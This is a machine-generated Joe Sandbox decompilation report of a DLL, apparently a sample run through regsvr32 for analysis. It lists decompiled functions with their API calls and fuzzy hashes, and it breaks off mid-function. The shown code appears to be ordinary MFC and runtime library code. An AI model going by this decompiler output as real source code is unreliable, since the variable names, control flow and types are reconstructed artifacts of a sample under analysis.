                                                                                                                			E100145C3(void* __ecx) {
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				signed int _t5;
                                                                                                                				void* _t15;
                                                                                                                				void* _t18;
                                                                                                                				void* _t19;
                                                                                                                
                                                                                                                				_t15 = __ecx;
                                                                                                                				if((E100177F8(__ecx) & 0x40000000) != 0) {
                                                                                                                					L6:
                                                                                                                					_t5 = E10013F46(_t15, _t15, _t18, __eflags);
                                                                                                                					asm("sbb eax, eax");
                                                                                                                					return  ~( ~_t5);
                                                                                                                				}
                                                                                                                				_t19 = E10012730();
                                                                                                                				if(_t19 == 0) {
                                                                                                                					goto L6;
                                                                                                                				}
                                                                                                                				_t18 = GetKeyState;
                                                                                                                				if(GetKeyState(0x10) < 0 || GetKeyState(0x11) < 0 || GetKeyState(0x12) < 0) {
                                                                                                                					goto L6;
                                                                                                                				} else {
                                                                                                                					SendMessageA( *(_t19 + 0x20), 0x111, 0xe146, 0);
                                                                                                                					return 1;
                                                                                                                				}
                                                                                                                			}









                                                                                                                APIs
                                                                                                                  • Part of subcall function 100177F8: GetWindowLongA.USER32(?,000000F0), ref: 10017803
                                                                                                                • GetKeyState.USER32(00000010), ref: 100145E7
                                                                                                                • GetKeyState.USER32(00000011), ref: 100145F0
                                                                                                                • GetKeyState.USER32(00000012), ref: 100145F9
                                                                                                                • SendMessageA.USER32 ref: 1001460F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: State$LongMessageSendWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 1063413437-0
                                                                                                                • Opcode ID: 95f1b131c0c2e130cfe50c6eb6efd6780e38a756da53206ae19ccfbb14021f1c
                                                                                                                • Instruction ID: 6e61cc1eb6a95425632292877bab435b541be555978035ebcc8d7c4d1af18e25
                                                                                                                • Opcode Fuzzy Hash: 95f1b131c0c2e130cfe50c6eb6efd6780e38a756da53206ae19ccfbb14021f1c
                                                                                                                • Instruction Fuzzy Hash: 49F0E93A78029A25E610BE744C41FDE11A4DFC2FD5F030534E642EE0E2CDB0C8821575
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 37%
                                                                                                                			E1003B247(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                				signed int _v8;
                                                                                                                				intOrPtr _v12;
                                                                                                                				intOrPtr _t21;
                                                                                                                				intOrPtr _t24;
                                                                                                                				void* _t25;
                                                                                                                				intOrPtr _t26;
                                                                                                                				signed int _t27;
                                                                                                                				void* _t31;
                                                                                                                				intOrPtr* _t32;
                                                                                                                				void* _t37;
                                                                                                                				void* _t40;
                                                                                                                				intOrPtr* _t41;
                                                                                                                
                                                                                                                				_t34 = __ecx;
                                                                                                                				_v8 = _v8 & 0x00000000;
                                                                                                                				_t41 = __imp__CoCreateInstance;
                                                                                                                				_t32 = __ecx;
                                                                                                                				 *((intOrPtr*)(__ecx + 4)) = 1;
                                                                                                                				_t21 =  *_t41(_a4, 0, 0x17, 0x100a594c,  &_v8, _t37, _t40, _t31, __ecx, __ecx);
                                                                                                                				_v12 = _t21;
                                                                                                                				if(_t21 == 0x80070057) {
                                                                                                                					_t21 =  *_t41(_a4, 0, 7, 0x100a594c,  &_v8);
                                                                                                                					_v12 = _t21;
                                                                                                                				}
                                                                                                                				if(_v12 < 0) {
                                                                                                                					L5:
                                                                                                                					L10020F7B( &_v8);
                                                                                                                					_t24 = _a8;
                                                                                                                					if(_t24 != 0) {
                                                                                                                						 *((intOrPtr*)(_t24 + 8)) = _v12;
                                                                                                                					}
                                                                                                                					_t25 = 0;
                                                                                                                				} else {
                                                                                                                					__imp__OleRun(_v8);
                                                                                                                					_v12 = _t21;
                                                                                                                					if(_t21 < 0) {
                                                                                                                						goto L5;
                                                                                                                					} else {
                                                                                                                						_t26 = L10020F57(_t34, _v8, 0x100a4a1c);
                                                                                                                						 *_t32 = _t26;
                                                                                                                						if(_t26 != 0) {
                                                                                                                							_t27 = _v8;
                                                                                                                							 *((intOrPtr*)( *_t27 + 8))(_t27);
                                                                                                                							_t25 = 1;
                                                                                                                						} else {
                                                                                                                							goto L5;
                                                                                                                						}
                                                                                                                					}
                                                                                                                				}
                                                                                                                				return _t25;
                                                                                                                			}















                                                                                                                APIs
                                                                                                                • CoCreateInstance.OLE32(?,00000000,00000017,100A594C,00000000), ref: 1003B273
                                                                                                                • CoCreateInstance.OLE32(?,00000000,00000007,100A594C,00000001), ref: 1003B28B
                                                                                                                • OleRun.OLE32(00000001), ref: 1003B299
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateInstance
                                                                                                                • String ID:
                                                                                                                • API String ID: 542301482-0
                                                                                                                • Opcode ID: 1fde761f56b54c249ecb57495a72b31083913e75a24bd9c800dedb74f9d4074e
                                                                                                                • Instruction ID: 324d8c50e8d3a31438fcbe536bc8f42647220ee4f3c1b4a0b0b6bd8788a7670d
                                                                                                                • Opcode Fuzzy Hash: 1fde761f56b54c249ecb57495a72b31083913e75a24bd9c800dedb74f9d4074e
                                                                                                                • Instruction Fuzzy Hash: 06114975A00208FFDB11DFA4CD85F8EBBF9EB49359F2041A9E604EA251D7709A40DB60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 88%
                                                                                                                			E10071CA2() {
                                                                                                                				signed int _v8;
                                                                                                                				char _v16;
                                                                                                                				void* __esi;
                                                                                                                				signed int _t8;
                                                                                                                				intOrPtr* _t15;
                                                                                                                				intOrPtr _t16;
                                                                                                                				char _t20;
                                                                                                                				intOrPtr _t22;
                                                                                                                				intOrPtr _t23;
                                                                                                                				signed int _t24;
                                                                                                                				int _t25;
                                                                                                                				signed int _t27;
                                                                                                                
                                                                                                                				_t8 =  *0x100b9e70; // 0xbb35530
                                                                                                                				_v8 = _t8 ^ _t27;
                                                                                                                				_t24 = 0;
                                                                                                                				if(GetLocaleInfoA(GetThreadLocale(), 0x1004,  &_v16, 7) == 0) {
                                                                                                                					L4:
                                                                                                                					_t25 = GetACP();
                                                                                                                				} else {
                                                                                                                					_t20 = _v16;
                                                                                                                					_t15 =  &_v16;
                                                                                                                					if(_t20 == 0) {
                                                                                                                						goto L4;
                                                                                                                					} else {
                                                                                                                						do {
                                                                                                                							_t15 = _t15 + 1;
                                                                                                                							_t24 = _t24 * 0xa + _t20 - 0x30;
                                                                                                                							_t20 =  *_t15;
                                                                                                                						} while (_t20 != 0);
                                                                                                                						if(_t24 == 0) {
                                                                                                                							goto L4;
                                                                                                                						}
                                                                                                                					}
                                                                                                                				}
                                                                                                                				return E1004763E(_t25, _t16, _v8 ^ _t27, _t22, _t23, _t25);
                                                                                                                			}















                                                                                                                APIs
                                                                                                                • GetThreadLocale.KERNEL32 ref: 10071CB5
                                                                                                                • GetLocaleInfoA.KERNEL32(00000000,00001004,?,00000007), ref: 10071CC7
                                                                                                                • GetACP.KERNEL32 ref: 10071CF0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Locale$InfoThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 4232894706-0
                                                                                                                • Opcode ID: 7c5983c97577f588b59cf57724e369f2abd5b66deef4b3ef37fb49ba411e0cc2
                                                                                                                • Instruction ID: 0c1d45a3c1da8539fc3e6f26400fbfc8b185508d0e900761260806733794f503
                                                                                                                • Opcode Fuzzy Hash: 7c5983c97577f588b59cf57724e369f2abd5b66deef4b3ef37fb49ba411e0cc2
                                                                                                                • Instruction Fuzzy Hash: 83F0FC31E002785BE711CFB889556EF77F9EB05B81B1141ADED81E7280DA246E05C7D4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 79%
                                                                                                                			E100111D8(struct HWND__* _a4, signed int _a8) {
                                                                                                                				struct _WINDOWPLACEMENT _v48;
                                                                                                                				int _t16;
                                                                                                                
                                                                                                                				if(L10010FF9() == 0) {
                                                                                                                					if((_a8 & 0x00000003) == 0) {
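                                                                                                                						// IsIconic returns non-zero for a minimized window: the stored placement is then read with
                                                                                                                						// GetWindowPlacement, otherwise the on-screen rectangle is read with GetWindowRect.
                                                                                                                						// Both paths leave the rectangle in _v48.rcNormalPosition.
                                                                                                                						if(IsIconic(_a4) == 0) {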
                                                                                                                							_t16 = GetWindowRect(_a4,  &(_v48.rcNormalPosition));
                                                                                                                						} else {
                                                                                                                							_t16 = GetWindowPlacement(_a4,  &_v48);
                                                                                                                						}
                                                                                                                						if(_t16 == 0) {
                                                                                                                							return 0;
                                                                                                                						} else {
                                                                                                                							return E1001118C( &(_v48.rcNormalPosition), _a8);
                                                                                                                						}
                                                                                                                					}
                                                                                                                					return 0x12340042;
                                                                                                                				}
                                                                                                                				return  *0x100bda1c(_a4, _a8);
                                                                                                                			}






                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 489b63a7479b65ba780142e98e756bd1a31218c467a0a3f2e6930d4b0fecdd43
                                                                                                                • Instruction ID: bf5f36a609a064637400546775cda49811221ced84bcc128ce8e713489aa1330
                                                                                                                • Opcode Fuzzy Hash: 489b63a7479b65ba780142e98e756bd1a31218c467a0a3f2e6930d4b0fecdd43
                                                                                                                • Instruction Fuzzy Hash: 41F03735604119BADF09EF60CC48EEE7BA9FB19280B008021FC65DA060EB34DAA59B52
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E1001A1A1(intOrPtr _a4) {
                                                                                                                				intOrPtr _t6;
                                                                                                                
                                                                                                                				_t6 = _a4;
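                                                                                                                				// Assuming _a4 points to a MSG structure: returns 1 only for a plain F1 key press.
                                                                                                                				// Offset 4 (message) must be 0x100 (WM_KEYDOWN), offset 8 (wParam) must be 0x70 (VK_F1),
                                                                                                                				// the 0x4000 repeat flag (KF_REPEAT) in the high word of lParam must be clear, and none of
                                                                                                                				// Shift (0x10), Ctrl (0x11) or Alt (0x12) may be held (GetKeyState < 0 means the key is down).
                                                                                                                				if( *((intOrPtr*)(_t6 + 4)) != 0x100 ||  *((intOrPtr*)(_t6 + 8)) != 0x70 || ( *(_t6 + 0xe) & 0x00004000) != 0 || GetKeyState(0x10) < 0 || GetKeyState(0x11) < 0 || GetKeyState(0x12) < 0) {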
                                                                                                                					return 0;
                                                                                                                				} else {
                                                                                                                					return 1;
                                                                                                                				}
                                                                                                                			}





                                                                                                                APIs
                                                                                                                • GetKeyState.USER32(00000010), ref: 1001A1C5
                                                                                                                • GetKeyState.USER32(00000011), ref: 1001A1CE
                                                                                                                • GetKeyState.USER32(00000012), ref: 1001A1D7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: State
                                                                                                                • String ID:
                                                                                                                • API String ID: 1649606143-0
                                                                                                                • Opcode ID: d169fba0290c97125a9a6927c0058398b1dc64852dccf2771887701992ec3b30
                                                                                                                • Instruction ID: 3e4df28d84f45c7815f7d19b03e5f5ad91f76c43e7f59ed5851f542e4bc015ed
                                                                                                                • Opcode Fuzzy Hash: d169fba0290c97125a9a6927c0058398b1dc64852dccf2771887701992ec3b30
                                                                                                                • Instruction Fuzzy Hash: 0DE01235985296BED742D7509D00BD569D0DB027D0F168465DD44AE055C7B0CBC296A1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 39%
                                                                                                                			E1000A5B9(void* __ecx, char _a4) {
                                                                                                                				char _v8;
                                                                                                                				char _v12;
                                                                                                                				char _v16;
                                                                                                                				intOrPtr* _t19;
                                                                                                                				char* _t24;
                                                                                                                				intOrPtr* _t25;
                                                                                                                				intOrPtr _t29;
                                                                                                                				char _t37;
                                                                                                                
                                                                                                                				_t37 = 0;
                                                                                                                				if(_a4 != 0) {
                                                                                                                					_t19 = E1000A552(__ecx, _a4);
                                                                                                                					_v12 = _t19;
                                                                                                                					if(_t19 != 0) {
                                                                                                                						_push( &_v16);
                                                                                                                						_push(_t19);
                                                                                                                						if( *((intOrPtr*)( *_t19 + 0x58))() == 0 && _v16 == 2) {
                                                                                                                							_t24 =  &_v8;
                                                                                                                							_v8 = 0;
                                                                                                                							__imp__CreateBindCtx(0, _t24);
                                                                                                                							if(_t24 == 0) {
                                                                                                                								_t25 = _v12;
                                                                                                                								_push( &_a4);
                                                                                                                								_push(0);
                                                                                                                								_push(_v8);
                                                                                                                								_a4 = 0;
                                                                                                                								_push(_t25);
                                                                                                                								if( *((intOrPtr*)( *_t25 + 0x50))() == 0 && _a4 != 0) {
                                                                                                                									_t29 = E100483AC(_a4);
                                                                                                                									_t37 = _t29;
                                                                                                                									__imp__CoTaskMemFree(_a4);
                                                                                                                								}
                                                                                                                								L10020F7B( &_v8);
                                                                                                                							}
                                                                                                                						}
                                                                                                                						L10020F7B( &_v12);
                                                                                                                					}
                                                                                                                					return _t37;
                                                                                                                				}
                                                                                                                				return 0;
                                                                                                                			}












                                                                                                                APIs
                                                                                                                • CreateBindCtx.OLE32(00000000,?), ref: 1000A5F6
                                                                                                                • CoTaskMemFree.OLE32(?), ref: 1000A62B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: BindCreateFreeTask
                                                                                                                • String ID:
                                                                                                                • API String ID: 2063283046-0
                                                                                                                • Opcode ID: a60a2f0ad3c0de062bd210dd787bd61b806ccdb3da1c243200eed73814e97d89
                                                                                                                • Instruction ID: 1e78cc75a8ae20b8c396a98d8a74b0a269190828820633218b219b22c11026c8
                                                                                                                • Opcode Fuzzy Hash: a60a2f0ad3c0de062bd210dd787bd61b806ccdb3da1c243200eed73814e97d89
                                                                                                                • Instruction Fuzzy Hash: D2115A7590021AFFEF10DFA0C8889DE7BB9EF466C5B148269F801DA114E731DB86DB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E100422FA(void* __ecx, signed int _a4, intOrPtr _a8) {
                                                                                                                				void* __ebx;
                                                                                                                				void* __ebp;
                                                                                                                				void* _t12;
                                                                                                                				signed short _t15;
                                                                                                                				void* _t20;
                                                                                                                				void* _t21;
                                                                                                                
                                                                                                                				_t20 = __ecx;
                                                                                                                				_t15 = E100177F8(__ecx);
                                                                                                                				if(_t15 >= 0 || (_a4 & 0x0000fff0) == 0xf060 && (GetKeyState(0x73) >= 0 || GetKeyState(0x12) >= 0 || (_t15 & 0x00000100) == 0)) {
                                                                                                                					L6:
                                                                                                                					return E10035C9E(_t15, _t20, _t21, _a4, _a8);
                                                                                                                				}
                                                                                                                				_t12 = E1001593A(_t15, _t20, _a4, _a8);
                                                                                                                				if(_t12 == 0) {
                                                                                                                					goto L6;
                                                                                                                				}
                                                                                                                				return _t12;
                                                                                                                			}










                                                                                                                APIs
                                                                                                                  • Part of subcall function 100177F8: GetWindowLongA.USER32(?,000000F0), ref: 10017803
                                                                                                                • GetKeyState.USER32(00000073), ref: 10042324
                                                                                                                • GetKeyState.USER32(00000012), ref: 1004232D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: State$LongWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 3716621309-0
                                                                                                                • Opcode ID: 39200d301d1b858de4d9ad93d43105858c0e4aa60223fee696361755f6f9487c
                                                                                                                • Instruction ID: 2818fe949eeaa3fada07e33bb7dd25add78df246c4191234671a53c1d3373df7
                                                                                                                • Opcode Fuzzy Hash: 39200d301d1b858de4d9ad93d43105858c0e4aa60223fee696361755f6f9487c
                                                                                                                • Instruction Fuzzy Hash: 0FF0243A30024A7AEB11BE55CC40F9E3B78DF40AE5F514071FD08CA1A2CA3ADE5292A4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E100369AF(void* __ecx, intOrPtr _a4) {
                                                                                                                				void* _t4;
                                                                                                                				void* _t13;
                                                                                                                				intOrPtr _t14;
                                                                                                                
                                                                                                                				_t14 = _a4;
                                                                                                                				_t13 = __ecx;
                                                                                                                				if(_t14 == 0xffffffff) {
                                                                                                                					if(IsWindowVisible( *(__ecx + 0x20)) != 0) {
                                                                                                                						if(IsIconic( *(_t13 + 0x20)) != 0) {
                                                                                                                							_t14 = 9;
                                                                                                                						}
                                                                                                                					} else {
                                                                                                                						_t14 = 1;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				_t4 = L10034F42(_t13, _t14);
                                                                                                                				if(_t14 == 0xffffffff) {
                                                                                                                					return _t4;
                                                                                                                				}
                                                                                                                				E1001793D(_t13, _t14);
                                                                                                                				return L10034F42(_t13, _t14);
                                                                                                                			}







                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: IconicVisibleWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 1797901696-0
                                                                                                                • Opcode ID: 8fb479190c408292b8806f0ed16e60ec7c97370c2ca34d43659c4ae1066408b6
                                                                                                                • Instruction ID: 32544ca3d1f440a6851f76ecaabb018c5daa1912da2af893c2db8d50037a759f
                                                                                                                • Opcode Fuzzy Hash: 8fb479190c408292b8806f0ed16e60ec7c97370c2ca34d43659c4ae1066408b6
                                                                                                                • Instruction Fuzzy Hash: A7F0A7363150316F860697299D406AE669EEF892B2B064237F465AB5E0DF709C6141D0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 37%
                                                                                                                			E10056CA3(void* __eax, void* __ebx, void* __edx) {
                                                                                                                				_Unknown_base(*)()* _t8;
                                                                                                                
                                                                                                                				 *((intOrPtr*)(__edx + __ebx - 1)) =  *((intOrPtr*)(__edx + __ebx - 1)) + __edx;
                                                                                                                				_t8 = SetUnhandledExceptionFilter(E1005148C());
                                                                                                                				 *0x100be888 = 0;
                                                                                                                				return _t8;
                                                                                                                			}





                                                                                                                APIs
                                                                                                                • __decode_pointer.LIBCMT ref: 10056CB1
                                                                                                                  • Part of subcall function 1005148C: TlsGetValue.KERNEL32 ref: 10051499
                                                                                                                  • Part of subcall function 1005148C: TlsGetValue.KERNEL32 ref: 100514B0
                                                                                                                  • Part of subcall function 1005148C: RtlDecodePointer.NTDLL(00000001,?,1005184E,00000000,00000000,10048D26,00000000,?,?,00000001,?,?,10048D8A,00000001), ref: 100514E3
                                                                                                                • SetUnhandledExceptionFilter.KERNEL32 ref: 10056CB8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Value$DecodeExceptionFilterPointerUnhandled__decode_pointer
                                                                                                                • String ID:
                                                                                                                • API String ID: 3433037573-0
                                                                                                                • Opcode ID: ba96318bd3f2b543104358adc6164b496102d5c4d2f6e6d4fe2fad0948d0796c
                                                                                                                • Instruction ID: cab9f6e41163872d63001fe864115963fca312adb94d19d4b818097a73cb4955
                                                                                                                • Opcode Fuzzy Hash: ba96318bd3f2b543104358adc6164b496102d5c4d2f6e6d4fe2fad0948d0796c
                                                                                                                • Instruction Fuzzy Hash: 6DC08C5D4286C00AF708D3745C8C3CD3A00D702300FD04988E88881092DCB84884C122
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 37%
                                                                                                                			E1001643C(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                				unsigned int _t147;
                                                                                                                				signed int _t149;
                                                                                                                				signed int* _t152;
                                                                                                                				intOrPtr _t159;
                                                                                                                				intOrPtr* _t160;
                                                                                                                				unsigned int _t163;
                                                                                                                				unsigned int _t166;
                                                                                                                				signed int* _t170;
                                                                                                                				signed int* _t173;
                                                                                                                				unsigned int _t177;
                                                                                                                				unsigned int _t181;
                                                                                                                				unsigned int _t185;
                                                                                                                				signed int _t189;
                                                                                                                				signed int* _t194;
                                                                                                                				signed int _t195;
                                                                                                                				unsigned int _t196;
                                                                                                                				intOrPtr* _t197;
                                                                                                                				unsigned int _t198;
                                                                                                                				signed int _t213;
                                                                                                                				signed int _t217;
                                                                                                                				unsigned int _t224;
                                                                                                                				void* _t225;
                                                                                                                
                                                                                                                				_t200 = __ecx;
                                                                                                                				_push(0x70);
                                                                                                                				E1004764D(0x1008eace, __ebx, __edi, __esi);
                                                                                                                				_t222 = __ecx;
                                                                                                                				 *((intOrPtr*)(_t225 - 0x10)) = 0;
                                                                                                                				 *((intOrPtr*)(_t225 - 0x14)) = 0x7fffffff;
                                                                                                                				_t189 =  *(_t225 + 8);
                                                                                                                				 *(_t225 - 4) = 0;
                                                                                                                				if(_t189 != 0x111) {
                                                                                                                					__eflags = _t189 - 0x4e;
                                                                                                                					if(_t189 != 0x4e) {
                                                                                                                						__eflags = _t189 - 6;
                                                                                                                						_t224 =  *(_t225 + 0x10);
                                                                                                                						if(_t189 == 6) {
                                                                                                                							E10015E0B(_t200, _t222,  *((intOrPtr*)(_t225 + 0xc)), E10013FEA(_t189, __ecx, _t225, _t224));
                                                                                                                						}
                                                                                                                						__eflags = _t189 - 0x20;
                                                                                                                						if(_t189 != 0x20) {
                                                                                                                							L12:
                                                                                                                							_t147 =  *(_t222 + 0x4c);
                                                                                                                							__eflags = _t147;
                                                                                                                							if(_t147 == 0) {
                                                                                                                								L20:
                                                                                                                								_t149 =  *((intOrPtr*)( *_t222 + 0x28))();
                                                                                                                								 *(_t225 + 0x10) = _t149;
                                                                                                                								E10012889(_t225 - 0x14, _t222, 7);
                                                                                                                								_t194 = 0x100bc218 + ((_t149 ^  *(_t225 + 8)) & 0x000001ff) * 0xc;
                                                                                                                								__eflags =  *(_t225 + 8) -  *_t194;
                                                                                                                								 *(_t225 - 0x18) = _t194;
                                                                                                                								if( *(_t225 + 8) !=  *_t194) {
                                                                                                                									L25:
                                                                                                                									_t152 =  *(_t225 - 0x18);
                                                                                                                									_t195 =  *(_t225 + 0x10);
                                                                                                                									 *_t152 =  *(_t225 + 8);
                                                                                                                									_t152[2] = _t195;
                                                                                                                									while(1) {
                                                                                                                										__eflags =  *_t195;
                                                                                                                										if( *_t195 == 0) {
                                                                                                                											break;
                                                                                                                										}
                                                                                                                										__eflags =  *(_t225 + 8) - 0xc000;
                                                                                                                										_push(0);
                                                                                                                										_push(0);
                                                                                                                										if( *(_t225 + 8) >= 0xc000) {
                                                                                                                											_push(0xc000);
                                                                                                                											_push( *((intOrPtr*)( *(_t225 + 0x10) + 4)));
                                                                                                                											while(1) {
                                                                                                                												_t196 = E10011C60();
                                                                                                                												__eflags = _t196;
                                                                                                                												if(_t196 == 0) {
                                                                                                                													break;
                                                                                                                												}
                                                                                                                												__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t196 + 0x10)))) -  *(_t225 + 8);
                                                                                                                												if( *((intOrPtr*)( *((intOrPtr*)(_t196 + 0x10)))) ==  *(_t225 + 8)) {
                                                                                                                													( *(_t225 - 0x18))[1] = _t196;
                                                                                                                													E100128B8(_t225 - 0x14);
                                                                                                                													L102:
                                                                                                                													_t197 =  *((intOrPtr*)(_t196 + 0x14));
                                                                                                                													L103:
                                                                                                                													_push(_t224);
                                                                                                                													_push( *((intOrPtr*)(_t225 + 0xc)));
                                                                                                                													L104:
                                                                                                                													_t159 =  *_t197();
                                                                                                                													L105:
                                                                                                                													 *((intOrPtr*)(_t225 - 0x10)) = _t159;
                                                                                                                													goto L106;
                                                                                                                												}
                                                                                                                												_push(0);
                                                                                                                												_push(0);
                                                                                                                												_push(0xc000);
                                                                                                                												_t198 = _t196 + 0x18;
                                                                                                                												__eflags = _t198;
                                                                                                                												_push(_t198);
                                                                                                                											}
                                                                                                                											_t195 =  *(_t225 + 0x10);
                                                                                                                											L36:
                                                                                                                											_t195 =  *_t195();
                                                                                                                											 *(_t225 + 0x10) = _t195;
                                                                                                                											continue;
                                                                                                                										}
                                                                                                                										_push( *(_t225 + 8));
                                                                                                                										_push( *((intOrPtr*)(_t195 + 4)));
                                                                                                                										_t166 = E10011C60();
                                                                                                                										__eflags = _t166;
                                                                                                                										 *(_t225 + 0x10) = _t166;
                                                                                                                										if(_t166 == 0) {
                                                                                                                											goto L36;
                                                                                                                										}
                                                                                                                										( *(_t225 - 0x18))[1] = _t166;
                                                                                                                										E100128B8(_t225 - 0x14);
                                                                                                                										L29:
                                                                                                                										_t213 =  *((intOrPtr*)( *(_t225 + 0x10) + 0x10)) - 1;
                                                                                                                										__eflags = _t213 - 0x44;
                                                                                                                										if(__eflags > 0) {
                                                                                                                											goto L106;
                                                                                                                										}
                                                                                                                										switch( *((intOrPtr*)(_t213 * 4 +  &M10016954))) {
                                                                                                                											case 0:
                                                                                                                												_push( *(__ebp + 0xc));
                                                                                                                												_push(E1000CCCE(__ebx, __ecx, __edi, __esi, __eflags));
                                                                                                                												goto L44;
                                                                                                                											case 1:
                                                                                                                												_push( *(__ebp + 0xc));
                                                                                                                												goto L44;
                                                                                                                											case 2:
                                                                                                                												__eax = __esi;
                                                                                                                												__eax = __esi >> 0x10;
                                                                                                                												__eflags = __eax;
                                                                                                                												_push(__eax);
                                                                                                                												__eax = __si & 0x0000ffff;
                                                                                                                												_push(__si & 0x0000ffff);
